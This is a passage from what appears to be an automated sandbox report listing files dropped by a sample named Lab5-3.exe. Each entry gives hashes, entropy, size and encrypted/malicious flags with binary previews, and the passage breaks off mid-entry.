                                                                                                          SHA-512:13856D3068E77F061C8F6BF99EC47AF63CCF51D52D1D6438C81A0D5DFE55B6A16C5A08288A201A9D8D196C6699E952037911AC0A94DF27852AAB8E074CEC9E8B
                                                                                                          Malicious:false
                                                                                                          Preview:..~..........b[.....i..l.#........... z.q..P.w.}p)v....#.....5...H$^...'c.S.c...E.........Y!q.je.`..Q.F..l.l{......x......z...]....'U..N..bl&.d..{.UxG...IZ.!dg....MA........(.~\.H.Pia}[b......p.n..x....>..'..}..-Qs..C.?..0dj..9..q.\.- .A...8...........>.tu.....7.....U...@X.:...jw2./.N..d..Ds/rd....^...'..to.r.Z....mh......y"oi............K....2!...A..,,.....n...'.1e...M..Z#.>F.m..... .....x.q.QU^3+1..NA...5.>.S....j...#.G....cSf..,....*..9c..6.p.s...@;.....D...b.sG...o.(t....YV......J....o.J.....9,.g.zo..WBm.kCQ.()*!.&.>3h@..Y4.6...n..a.4.....#...,^.L.*....L..2DR..(.....m..u.....O.G...=...N....&.D..zjJ....n.4{aj.v....6..r.WS.m......)V*vK....l.....\:-Mn.....3."....|N .`......."...C.nvFr>.5Q..;g8....b.Ye.O.n.D..81.r.Q....^T...x..Fy..Kx...K.....NvPN..'....o..S.Hx..]..ON3f.M9t.kU......p.........i.....[e..Gzhq.....P..."..f_..|....6.....|L}..R..-{TW(A:.@Y.}..n....Q..u.i..G.+.V....]....N..`./._.X...Z..O.w....y?2...No...n.3.U*).!..[.:..y
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7168
                                                                                                          Entropy (8bit):7.972015914051876
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Jhu0TUGA5M9PX6mmtFwaARxSrvHv1EmSJi/hKcveRCObeb0Cb:ju0TNPn+uErvP/Ciexebtb
                                                                                                          MD5:9EEC6107A80C4B0DCFCB4FE8116C8DC2
                                                                                                          SHA1:A951EEBB849F4DBA1C1C88E8D0205DE96A4513E2
                                                                                                          SHA-256:8D3AE2400472EE3EC71E6BDDBFBFFD07CEA85EC180B173602B8083D7400F2714
                                                                                                          SHA-512:5892A63F7A3BC0755667FD6E49E08C50BDEBF4CF11E73494681042C275FBFDCBC03986B1F360F789EED94C2894A723050E29916CB3DBB1411EE7CEBE7DDEADDE
                                                                                                          Malicious:false
                                                                                                          Preview:.V.i?..O.*.H...-..->/..l<.P/V.w.k.....F....E....V..L...V.qs..K#..g.G...~...wr...L.cY.6.aO.Q..XBiz..D.?h.s..&........7........j.4^>......m7?.....`\..$.eFU.TK6..Nw..*+#...-(..L..h...3.&W...E.......Ac./kS..-|.,..8.:.....nR .....x...J.....;.S9...qNr...pE.s$o..=h..c..'.A.......S..q...A....>.(.......o....6...K....:n....^fv_.........rL....8...K.....e.l...8(..?...{;..0F.Hn...1wCu.........|H. .d...g..7n]k..H...:....a.........$M~<M7.^.<w.....D...:g..r....hp...[..q....\-.'.4%... f....~P.- ..ZU.*1..s{....N......;..<;1-g.^......).X..e........@R..P..6.*.!..a.B4b......e..l?5..6.q../nFQW?m.4C|..6.L.U..."-a..4..v)c_.O.G.}$.F..._.;...AW/...6......O..E........v...LU....S......ipc...z>dY..x.....^R.l.../g.4.......-.>#..oX.t*..0rY._._..=.7#*..0'i..IL..@.....X....._lk5.u..<...^.(..2W'J. ..w.K...;.LY.g.z.........U..........'..1.!..=.....I.....-=.p}.qk,a.d..O.t]I,..C67G......h#.rX.k....do,..K....G&....*.+,......jH..6.*.KD_..c<....6..1..a....i5.H..n...`.QgA .4...].;...q.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):25552
                                                                                                          Entropy (8bit):7.9918245421134815
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:mhh0PFW8RjtD60pkKR12BvphWFT61e8Jz12ZqRZ:mj0PF1VtW0hR0IJV8JzmAZ
                                                                                                          MD5:A9EC14CB75315872189A1A832A2CD385
                                                                                                          SHA1:03FB07743EB9DBB37A461F07DA594BAFDB67C270
                                                                                                          SHA-256:1452ED16D853869C80B11DDF3468DD70BC07FAC651A06FABCF3183A1FF0BE656
                                                                                                          SHA-512:F49DA42C88C372C061D0F7AC72A550FF12C28D9C899FA4F19963ABC688B5DCBABF15BB4C7BB40E39CF307D5DA7E64AF21ECB9044D6B1F0E53ADEADFF97902DC0
                                                                                                          Malicious:true
                                                                                                          Preview:/b....]...cY..B%>-...rNF...(.....Y%.0......5`.S..2..a..-..E...u8.X.t.B/.w..:.4&.1..2.]............#...(...m,.K_...W....dp^.*..#...:.{.;kN.....<a1...H...Q..B...|.-..WB....L."m.W.X...I.=....AL..q....@.. .|.@.N.ux<... i..{`@?..8........`.=.qI..(y6...;fk.*.?.1..t....(.Rw.....D..f3..../.n..c........... :..u,>z_....~R. >g...+\. ..RC..0X+....l...yQ...U$...}8....S..7...lz/...k...[.T.r.......S...w {.pLW...h....~gJy.9.......-.gE..,a.p...-ZJ-...'......v.{._Ux.l!._Pu.:s6k....L.Wz.<8.?.^#....g?....23....^sn...2.):=)...]KH...$6...).f.(...hS|.;....7.8fQ....t@.$<.%s.%[....,N..,`k.}p.'...I...........a..z..o.3.n...)...xV.t..."c&ob...{..NG.#...G...f.-n...c%y.j.7...L.......OIw4SyvO.rj..QO..]..W..5.U+E..0...J..a..`../~..s..Jx^..%.zN...........<..O.L T.#..Y...R1\.}..Z.6.^.cm.m@...&.I6}3....nc...,...ZG%.+L...8.9....0.......2f...Z!..A.5DM.tm%...:.....0P%&z.../_......v...........*$...L.=......3...D..g/....J..^.W.)......g.....mj..8....a...ET....<L...=(V.p....(h. ;.z..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8400
                                                                                                          Entropy (8bit):7.975810960725757
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:iYvZapSJz9oY0T+jXM+PIMk2f/7xBU1+O0Cb:iYvZaMmBTN+2mtBUYOtb
                                                                                                          MD5:6C2858CE498BE66875193A0EA26E64B2
                                                                                                          SHA1:B453C002076812F18B2EFA82E04295BEA7505BA4
                                                                                                          SHA-256:9C899DCD5C3FC62DB8B961C059A48D66E9A5E395F0067D79FBC1C38B016F4446
                                                                                                          SHA-512:DBB4755957AADB7B5623B6EC8C2B36D5D4D4EEFF2FBFAE80CC9F1C4F51C098579110428D1A09B7731EC04215C3B8B0EFE2E0937E9B84B518DB5F5595DEAB6DC0
                                                                                                          Malicious:false
                                                                                                          Preview:.....'.p...)s...P.E.b..@.H...X..8.....Qi..H............~.H..bS.'.;...s<..Re..<....@^t.c.g7v..#;........&..W..L...c..k...j.YsE..0s....Fam.M..{Mp.()h.%W1..%....fb... i.#y.O..5.Lf#....Qo9....8......=...)\+../.x..Q..;X..5.]M..".F...../.7.^..=I....6.......<...@.A......a.....?~.&......K...nM..q.=D*....j.N$........M+....{9+7{......2.n.XDn.}.##V...Xct.....*:j.....?...\r.9m.....B..Q1a .":!|L...DUc........0t!.(/c.x.u.....&B.z.FDS..6 .3P.=......_.B.N..-.*..5.?..DG.......0....t9.e.&..c.=....X.Y{..#.P.W..".A`.G....G..TT.=f.S.)......l.'=....}..Q....4....X=*..).M......7......,..{.....m..+r...H..6.._.B..[..i..S..&.,......X....3s.G..../.f}.v....@.[..asP-H7..{..|....Gm....,.D.;5..M9E.D.......S..+.y+.M...uB....7.!...k.9....{DY...+...n-.<$...z=..%.}P.o.$v..T...~.,lz..!...E...l.qAc<.z..V........_S.JH.Ub./...u0y....3te>.'..y.B..I.&..h..c8f...~...GZp....(a..=../.1...mz..:.2b..qJ..Z<....y.].BBm&.=.......S.G$O.^PD..n....H.e.......|..|E.L.3u;.~q..=..+*hlg.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):20000
                                                                                                          Entropy (8bit):7.991660172933379
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:EX4oNRsmWna4VFGeibg9ITPW63CPeYht1oLA7T7XhrVw4nRSiZOWJdxltb:CHRsmWaqGjpdOeUHzhrGiRHOWDxlZ
                                                                                                          MD5:BA8A33BF604A1A007E51872187E7494B
                                                                                                          SHA1:1DBA74C7F8E25699B99857ADDA25D3AAB27D500B
                                                                                                          SHA-256:AA0AA1C5D985812FFA2DA28B38E9CDA92A7BAB87A329DDCF17E2B9FC3EE571EC
                                                                                                          SHA-512:150694366D6235A3A364183E698196B8587C0CA71F2A46DBF71C65333C22A1C19FEB8A69B17E560C077B769B1F942AA7445AE64B3C03FD602FC1DE219420AD58
                                                                                                          Malicious:true
                                                                                                          Preview:....H(..W_y.5.(..E.kg5.0-.8..5.......~..`.....xQ`T_n..2n\._.C.....F..=......*..]...1.:...*..;I._.+?<V....9.l....,G-8j.3T..Fe.......E.n...s3...~QM.W..pa.9....?5.../..".Z.G\.WE.....7q......m.<. v..|...Iw....e0...R...iq.._...)gp..w......f...C..O.Qh...b...R@....>...gB....3../...k...RE.gtI..@UU^...e.c....S..Z...tt..$o."....7wkS......b..cf%..<%..!N-N.~"..>...s...,N......s.L....Y......W....*..../.S.Q...Z..."..U_L..e.D.5....A..._3v...[._....OsV.....R...U.X.H..g.T.qdHb...V.F..}....R[=.U..w..v.}.MW.z.Z......n&..9+.!.j.....p...VO.`...2..L.7...%.Y..;.*h{GI'./.yU.. :.....7~.[m..).)a...z>.2VE..r.-..u.{.9...I.*0....=..{yt......t>Y../.._.9<........'....6..^{K......l.j...F.5._..D.(...K.6.Z#>..[._n%O.^.J.....Td.....D=.7..b{i..F....T8.......2!A... n.'F.6.:8...J....'?..Z..((..A.(Kg.3.....x,.2+@...;L...6*.d.....&..N...e..lL..!...]E...w...iz.9`s..u"7.).W..YoMS.n.{&2D.ll.+...~k.~\.&I..F.X;h...29a.7_..."'r.mR.M.@(G..+dP.g...X.E....VIn...g....Mp.>.Ea...e
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7168
                                                                                                          Entropy (8bit):7.9747495909297434
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:jd5JUHjvvI6iPQN3ioRnHO7IQssIxhwdZQ42FktAQhbelvsN1qDsGx0uKeY2ElUJ:jjJkjnItPQNNHQIQ0xyGrFktixy+f0Cb
                                                                                                          MD5:D5A5E08BAE6B530DC20676B25C474745
                                                                                                          SHA1:1B551446F7BD13A9D5744B94500FD392A4B3A184
                                                                                                          SHA-256:107B40FFF1244648F3B0FD90C44DBFEECFE20ACEE2026F960516D5CE150F8533
                                                                                                          SHA-512:50C9D3E268A746CDC158E78E1781A73C071A25771ACA19C5BD58168F7A525D602E17F13C02532F987A7EAC4989C9816F51B0482DB014D2398CE1057DFD616A9F
                                                                                                          Malicious:false
                                                                                                          Preview:........-...Jg.i...+...BJ.T60.....3..D.g.@`....J%...^...Q.![....B...c....~..h...PXD38...9.W.....`.....u..zG..d.8..G@:..`.G.....YH.?~..6.E....q..}..N4.Z.|..........."5u."4.,..R.~...^...`.*..-$y05\...v.Pe[.].q./)..V..tO..)L.k.%..V1..DU.]. .xE|\......#/)^f...f.m.tt^.q.e..S..%... ..y..f1.....Q.......t.J.c....?.k..n.K....R..pK.J...po.IOI.......e.Z.RG.0...H..w).G.m.......${Qk6I....KR....!.c....N...F.......z...N..N4...L...x.....m.K......Q.H.LOUIw....:...Z#.l7KV5../3btX....b;...K.;\.f.o&r...FJ.... ..wL.$.PU....Z.K...FEw*..]..*..1.[.....%..3.....b.......uv..;;..w.t.J......vOaq.X..U......d..;5.9.......H...eY.....4%.ZL.....d..4.sH.@.2E.._....G......D.n.HM.c7....O.....*...........7.K...?hqY^|vt...=.u..#}..3..\..z..]~..^.4H....>H..TpA...Bl...<S2Vx.)..^..~.......Fi.."]n.-..e...,...-..lt.4c.e.'.z.Z.RQ...........xl.E.....^e*Q.....\z..e.|P.....?K!....ONU...../;..%..T+D....D...I6...Az.KymVy.....P..|.../...5.K"-.C..`=.'..[..~.;K#x.I-w\K.n....%.y..I].NcFO.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28240
                                                                                                          Entropy (8bit):7.993376061786277
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:QpKWhYIG+F3u/vebghX5Rr00SLoyOjw9MDPY0XTir0nINiLqZ:QpP7G+0/lU0SLonj6quriGeqZ
                                                                                                          MD5:F270BCDDA7B3CF2AC6A25AB28219EA16
                                                                                                          SHA1:C79D33EFEE05F49C95D681D47BA9CDF0ABF02593
                                                                                                          SHA-256:BF0D855A89B4D9AAA6A1B56FB5EC9331DB5452413DCE4ED193E4825CA8BA3B4A
                                                                                                          SHA-512:6D77115FCE671E31ACFA486044B205881BBEFC44D74F6563BB1D5B0198964CB40A8AFB92E89A1416F35EC702CBA065171C3586404890B0868B6D85986EB76CDB
                                                                                                          Malicious:true
                                                                                                          Preview:t&).u..b.X...T.:.T.Bc.8...J..@.e%J1%H...=...Z.L\Nj:k.8@2.I..>y>.>Z.4Ll.."nm.}.A.......P..E.......*.k....{..U.MU$......i...5.....]J}/.........M..XKrV.^.g...!.a.i....._.bU....NZ#)..l.|..Q........p....s.'9|E.....uN....G.o..[..A9.S..s.`,$Wv.l.3QA.$..o...........d......!YVt.._ZQZ.j..2...p~`[B%.R.Nq..4....K.'..d.Q'9c.....^o.'..Y.].T...I.T.S.p..)..X...C..7.....S....kaQ.H.s$....,...N...2.8~x...33.%.d...k.a3..Y3<.AK...`.u....z..9.v....z..:s7.$.%.-i"....8...d.......PH....dRmO.......`.....n}...;.ta......vY..{......{KH..y...m..>%....Uf..!....u."-..SMK...kF=..._...o^..v....;.<.X....W....n...[e.W...i.].e.... .......L..I4.:._.i......Zh.n...`D.N.....^.D.L...TH...._..z}&.x[.._..$......j.LX....e...-.."#..].r.Hu.,.....7~.,....j+..s...6.....4z....p......,u.0.c......R...A3..^. ..9"[..V+8..6(...U..#...._S..`..v..?..r:.0jw.../h...Q........(....~....!s.D?...6.$.*&.s..R...(.....S....q....J.E....7.5...6No.2..<U..{.....lk..'...tG...........=\Ks..&*D..A
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9376
                                                                                                          Entropy (8bit):7.975962032389078
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:k1o7ZnKZ3end1j+CQkUvPc0rxVHs8Vxhr0Cb:koOlkUvPcCHHVxhrtb
                                                                                                          MD5:83BEB928D0325CACB5F4065822D64159
                                                                                                          SHA1:0DFF8216CF4670CB6673346ADAABEC49C632FB03
                                                                                                          SHA-256:C25E935BDCBA08E31B3969E058B59CD56ABFDCEB1F639364BC6931C8A8D3AC83
                                                                                                          SHA-512:0161CFFE517463432F5589A651A4ED8A9178984F62FD6DB901AEAC398CD05645BC980BF113CCEAE3B685A3F7795DF030BFA4B3329649AA2F2EA966763CEBFCC8
                                                                                                          Malicious:false
                                                                                                          Preview:..h.,>s.'......3n..g..{5I...t.N...Ta.....&?...q..x...L:.|.64...~.L..3..\........{*(k.s..B.T.......=.Q....h.._.....#...A.5.74[..%.y....G;Z.............F#-........*6.?..r.m'r..*...........i........n..(.5....C..9]2...<.Hn|?..-k..b.Z.C.F.i+#.r..L.<w:...#.w9....`.H..ph;.-Gh....../.c%.zI.c\.......:.u.y...6.Y....Y..LH'...-.s..:]......ma.......egj......{P..J....35.j..6wz.D.<e...a....[...I..kg{".g..T..-.<*....p...P..W..4'.EBD..,Q.....>a..i..i~...Ir._.....9P.W X...>...;......sk.lU".:U|:..7X.8*............JI.n.aLYf?L..qf{...Y,.`...:.U......T.H:8...v...Ov#v.1w....YE.,......#..P%.x...N...Q..p.C..PV....&5Q.-..c..^.c...@.9..<..... g.%./.0.E.=A..U....K..8...Z.f...`...cz....*..0.....D.2.0.q4A....,.(7..Z.=...._.b.E..........I{..UV.*<Z...8&...b1.#B.KX..C4['R...,. . .....0]1[*.]...>...MB.{....(1...Q.2ov.......j.....U.|%..s.@D4.s.|.......uD...w.S....#..*FeR..\.-.bt<.ju..F...r....,.l.2.b...)..{..-.0..6J.c.6.1.7/......_e.$..z5.Z..H!I....;f.b......WN.._..]...w.M
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21648
                                                                                                          Entropy (8bit):7.992930885412121
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:L+74C3qw+orUT+IFTBrjBrRBGDut6b+4QUw4pGV9YHKETXrZjMBltb:L+N7r4FNJBrTGDugbPFwY5qyrZYBlZ
                                                                                                          MD5:4CBBD36821C898723B0FFAB441FE8305
                                                                                                          SHA1:0169D45313B28F22AC08C6B46B167FB945896FDA
                                                                                                          SHA-256:67EFF365304816AF252D507966020E94E4DE59F84E7926CCE08A635B2C2663E2
                                                                                                          SHA-512:E39FB1E2D1CB797309FFEE3236AF8F72723008DEB3B672F5EFA50E8E0C122AD3F11BD47E7C889283988D51EC1A7C836CDD7D2A048406BB10C506A643686C4831
                                                                                                          Malicious:true
                                                                                                          Preview:...b*jva.......b. .H....B..#....p.....'.qa;.....PmO.....m..P(.....G.....=..eL.x'....NL.2.uT..jf..P.kc214{j.C~X....2+.rP.......-).r1.......$....7 ......G.\Z.L.$-..,O.^.A8./...?...A..Z...v.\V.m...~..$q./.:!6.}N...u2...F{n.]...s...*.....s_...<>..q7..P.,.n..N.-.%.^....f.T......o.;/Av.I.Sy.ti39...A.!o.....v..g..9?|1..P{....Oc$.x.C..[.1X..yu.LmQ....f....%...a...[&..\[p...f.i.....7...@.+..UZ...!......v.....38Uo.=.."gv...6...6p.X......+,V...d.m.>`Q.........e.a=G.v..a#.l.P.Y..o.T...8..rs.Q..</..S.d.2S....'...*...Vm..Ep;.w.......p.G...U.j...8.kV......js.;..!OR..l..1.2...Ip.98:Jx..=..$..j:._.!.......#..oR.|...,Y..Kx;.*... ..9.`.R.D.E..@.O.r.38x...x.e.W...DDL....X-c,.8$.g..sq.v....Y...7....h):...R1.O. +.g..BG..E..KH..2...w.s..7KK3Y5,.oV..`<.C...^..D.9.;..u.......y1....I..s.'.1=+..2....k..qb...0...9#....k.."...<...`"W..Yf3......p.qV....o.R..Nj....29....k}.D|F...kn.f;F...V.p..7..*K....?......u.k.6.....5.~..B#}!m..D.......1N.....V...A.f.Y.....mnI...N...P
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9184
                                                                                                          Entropy (8bit):7.9833818557022065
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:UNPOIGkYYqqzUCpBJS68bBMx4WDRSbe9l/fSKCLehXn0Cb:UNPOI9tqqVBzRDR4e9BfSmhXntb
                                                                                                          MD5:3199765E90C74EC9206F4EA75D253703
                                                                                                          SHA1:CAC4AF0F37D7EBE45CA56EDD4AD5CE61A2AF27C7
                                                                                                          SHA-256:B3E9FC344AFC984A07D8E7C3E643D65E6D04CB2C9BBC5F0DEF2A32FB4D5B469A
                                                                                                          SHA-512:358CE80A9A846D8700C65490F693C175B6FA934B01B76E79FB1B2139C2EFBAB16CF48D6E175D6DA6E4D3868445BE090C82E20A439E0463631F83D6459F5211D6
                                                                                                          Malicious:false
                                                                                                          Preview:)v..........QYX.D0.>h..b1^2....q_u.u.7!..e.#...%.X.q...........w..o.4..K...eqi......O.../;.S....../h.#..?.;.9U..*....c.5=.......;..N....U..h..S.....?]...].W..N.7.-..j1....r2.........A\D.H;....x.....J5G.3..M.....8...<%.or...vc.n..S.......,VY..3.....iCr.........8I.h.....&........vA..V..E.>.-d.FY..<. ..3.s...SV:.S..Q.'2......E..B.G....k.qL.vg...y...l;...|..J.,l..w..{.9:X...YM.4...mh..o!......{0M.\Yk.n.a.J.c.. ........bCd.H^h.I1..?<...0.c.......H.l....<<+&&.....|=...8-nJ...0...F../..L.Y.4..%m\.....g.P..T5f..rF..q..B.....C1t?.......Q|7..\#....q....J!....8..!..B.........k...o.HpV..`po<4.X.?...&.m,....[...)...JIL9..?].#|..?Pxk..v~q<Bi.j..".|pU.C.'x_'!u...h.R..F F.......k...:.......)...T.[..ar..V. ..B^.9..E...[YW....6..as.@g./[j.4.P..G... ."n:*.>..0>..)|=$Q...".7..B....mQ.%......7"...!.u'Z%3/...w.m..M.[...1.3.G.R.N..]-.<IV"...'."...5P`.g...5......l..PL.W).....<;...XB.O..}..B.Vk...:..C..2.. ..y5|..o:m..h..[].....1C.F-q......../..._.)..#k&....X.k4g...4..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19264
                                                                                                          Entropy (8bit):7.99060606873179
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:vXx3RzdUVl2qpjEzK0lxEdwRAgK5lhFJime99gS1X85anFnlDJvgzajGtb:5hzdU7T20wiPhFPy9Vs8xlVgVZ
                                                                                                          MD5:48E882FBDF190C6F216CCD1855FBF3F7
                                                                                                          SHA1:EAF9F78946D0F9251E4166C0E8269368B3C4D481
                                                                                                          SHA-256:3B5F18C03F3BD85E250247E17D9FAF53380C1C81AC1453E8FC170005D04582D2
                                                                                                          SHA-512:D6FAF4A84A4D5DF98C1989EC406150D86E6BE07D75662F08EAF79B27F28AB99D3023FA3C539B0E242097E5E97A4470C4F5543AD4B6736FE4366AB8DB00B6B76C
                                                                                                          Malicious:true
                                                                                                          Preview:V...Y.>8.Z.x. N.1..IKW.J]...MQ4....=%k.)T.'U.8.K.<...(D..J}...F=o+F.....Q.j...d./.C'.>.:Y&..~..]u.2".J....iK...m$,.....%I1[.4.z#...7I.@.6... ./q.z.Q..E~.f.l<....X1..'q'....<g...CS.y.5#a.k.R2.......g.f.n..0p~........>.{...L....+..xq$Ys.*.c.n.=?x..../.....h\...'......{.........f.V..)..:.2.........&..}b.0...<..8T..CE.}.. [F.......~........A.g|@..[...!~Y.".Hs..@...!&_....#..ld.V.>.%.Kp./.8..i.E.. .I?..xf..&.abH.as..^/......a9].(.....M... lZ*..=n/.Q.....v.........>].:..%...S.B..}...8.. u.. ..........U+.#c.e|.8.N.T...Dld..M...d#..(!C..B.g..R..h..c@:&%...l.+......o....1;.......p..<......J@..Q.l.....>.K...E............/A...._o3.;..x.K1EqH!..J.@a...h~..}...;..(.W>.._q+.f..Qm..*.6.d...M..b.C.U@S.>.k.U.....<.d#2...E-...0m;0K.....9KW.%.S.C.l....V.F9..k...|x..~......pK-...4h?.5..e.WL.b.,.}....I..}..v.J?ED....ScM..%....<E#...|#O.4\d..N....b.j.G4..)..6...%.+..|.j.V......>.:.x..9.........X.......t|#...z.k.%..0.q..r.#..z.."_A.xY7..6...q.&...+H.g?<;*..!.x.=.....H.K
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8960
                                                                                                          Entropy (8bit):7.981765855102252
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:JJzJmH/I8bpmrat4dTwu85q7ko73mth+wEW0Cb:JJKQQpx4dTvTmv1tb
                                                                                                          MD5:CBAA5E71D7DEC213A64E120F5B8D5486
                                                                                                          SHA1:C7D6A205D88C8A6DF6071876A543B0592190BED2
                                                                                                          SHA-256:8D263C0555690A5FA6F6A773EC1569994F5AEE6114426E0E7B9F89836850DACF
                                                                                                          SHA-512:E25895DA4EA215E442D9430A446F6E4A493DFD4AB6E4289E96A0331A212DFD09285B8E349B437362CB325801DC5A84659E989444BF777BB5D60311E2FC734926
                                                                                                          Malicious:false
                                                                                                          Preview:%E..K..%...%.....A2f.F..l.H...."&..X.2J.#@'..I.0...w...8..i..'..t.tT..'qA.Y"J.*.....1Y...7.hJ...fS/.X^.......).d8......<.Z..`SO......RSk....u.I..#^R.V.....5.A....d..i.*............A...U..U...M...%.-..u[......fMO@...eM...&.r..v........*bn.8..n.(...C>q-kWWk...mW.[+.....wT......*.//....t.!^)c.K..p#.......IRh1.....g....(....i.7...s.-.Q..;..O..s..j.......$..$._ ..=.3m..)...E0..F......o.T\a..>..;.O."F.".jK6.Y.......B..~...y...Z.}..SU.......U7i..S..8.3,)3.FT.......?.S.,...:n......./s.#...b..l...:f.....j0g:..m..C......tY...|..n...x9...S.........x....|......X........S....Jn..X;+..N!..0).G.7...!..~T.\.FA..?.4.....0j....'MD`...=.'...d.v..s.8m.....S.j..r...J. ....'xT'..A.KX.U..k..$.W.JR.................f.q...B..HGZ.'A.V..g.xD.o.Z.<....c..:..Z."A.t..N.......)}........o...Ei..]4.....|......\` .#I..a...!.y.v..].....U*?.byp.*U%Pf.x....@.....q.q..k/....=<%....D.o.g.Y%.... [..=.Dp.>.2..s..]...BGg...~.u...........[..X&(.W.....P.......8.D..Sev..iI..W
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19152
                                                                                                          Entropy (8bit):7.9924115080091305
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:tj4tiSxLoTYiQjv92ovd8m2pQpFlWM0rmCWapf40aVcKveShZ6BuFmS0Tdtb:KASx08iQD92ovd8F2FMM0XWo5QFveSrI
                                                                                                          MD5:F4C4671B8495B0F7FB1AE08CB192B59B
                                                                                                          SHA1:03027B9F196029AD53C9A59F8A1EBCC1E5FE62E1
                                                                                                          SHA-256:F8E496F4EF2C90E447798C3A519A87D641DC32C04A678A8A7367A3D0EDCA50FC
                                                                                                          SHA-512:926A95D2191DC77C3E565FB09B4DD6CF3E37EA6603165C5D990AFAE754A62D64B7A48B0BE2586329FD60C57EAFC40ABCE4359C9DC57ED53F88CEAA87601CABB2
                                                                                                          Malicious:true
                                                                                                          Preview:.c:Q.....y...H.h..h<6j..Q..e.....x..z.^.A.7.....5..4..b...'.....U....5......`...z...|.B..U..T.4..o..@..HM.B"XAc..,.O...P.^%..N.s...&>......W..7......!.....P.......gI.......j...|D...i..6..W..Y.....T&.[1b.........>kr.#.......y.....Y.Bo...kRq ].X..u..}.Z.t.M3..v.l.l...Z.paW.@{...(y....f.(.h...p....P.. ./u..]OH....6...R....PQ..>=.....r.(.....Q..,..0...P../........b.%..!.....?|.x1..l...f....P.(...*.Z 3.2....@.%..x..[=....x.....H..DuM...M../e&...r...YC...R.).....p;v=9.....A..F.<7)Sh..PC...t..2.'|..Ply8.......g...|.5..)@&. ...].-.O.m....H\P....>*..k.%...z.. gD...Q'.r...2y.jm.l)X.[...eo.`X..pk.WiNj.q q....(Oe.n..x%fe.B.`*.....Q.~..JD.6#tO..E...;.>1.h...}V,.._|......>S.$...Ev,..N.....%..F".,.Knd..*.<.K7...{.............[.{...'Z..I..y.Z.....X...]...T.=....%D-...*..z.k\.t.a...1.?0......Z.../..1np..M...E...h.....S..}.....?....J.. f:......q8....C._..(\..Z..K..&4....;.l.c2i..h...x.'N)h'b@......+.xU.M..o.....7.V..VC9&j..[...0=L.k."...8^.X/W..%.N.x.X.d{.4u...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8976
                                                                                                          Entropy (8bit):7.978420986375895
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:6CiG7jRC07rQnlJLuCVePJOiPNc6HUDrOX3fA1M4e70Cb:6mrQnP/VQpNtHUDru41M4wtb
                                                                                                          MD5:CF4739BD22E6A19C9C8F45A427E0D0EB
                                                                                                          SHA1:390D60415FD574C935F36436061B7C4EB824AA11
                                                                                                          SHA-256:5D664AA4E4D1A43C387A9411CD346FCB9A8E93CB8806539770542E498317F064
                                                                                                          SHA-512:59D68320DE110A0DC2CFF6083E5D1A37F5DD2334B339F1098695A632847F66BF20F7613B5941849B94A02DE44E1C2BCAEB329FE8B0414E84779181B639062338
                                                                                                          Malicious:false
                                                                                                          Preview:...|5...Sf. ........$/}..5.......H.-H.x..v.4.;n...f..+......9.."..=.C...C'....3......&T....'......K.~m..E..]..qB.d1us.2... D.\...~?.]F.@v..5)3f....5....uzR...z.,......d3E.xP.L.dt.),U8.,...@....Bg+.He_uk_..i.1.....Yu.o;...o).,.m.8...."........Q...*.S.O.y.4...t..J..@...X..~t............q.O.}......Q..S1<...|..*..&.....~...j.'=U.."^..4.<Z.>]..D...~.............3D..N.cV.Q...V.-...0..u.O...'..Y.1....Ij............s.=."....-.....l...2.`.N;.^...3?.=./..S....n>....,;..!V..N....A3.;.cyd2..{ V.p<.....Md...Q.o..IiJ4t......I...&..^I...u.O1...~.D.5."...A..Ys3.D.sR......R.E....y@.`.....qi.6.`....,..{jh.....J......Z|..c.i./g..A.k... `Y...H~..[.2y:..0..>2.l..-F..<m.dZ.....1y.7....&..u.M....mT.4/3i;.,C.........y....Q%_......v.`07&T).....4.iZ.H .b..']....l.*..y..<.*B.*...?O*..Fr....=..g5...b.6..[....K..r(...s=T.s.....Mo'..I.....[.&.c....0...D.W...{IQ.l..b.j.{..m.L@...>...S...{.)Y_\...L,.P..=X..u..q...w..V.t....V....Y....`%.X..QPy.h........y.<.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16912
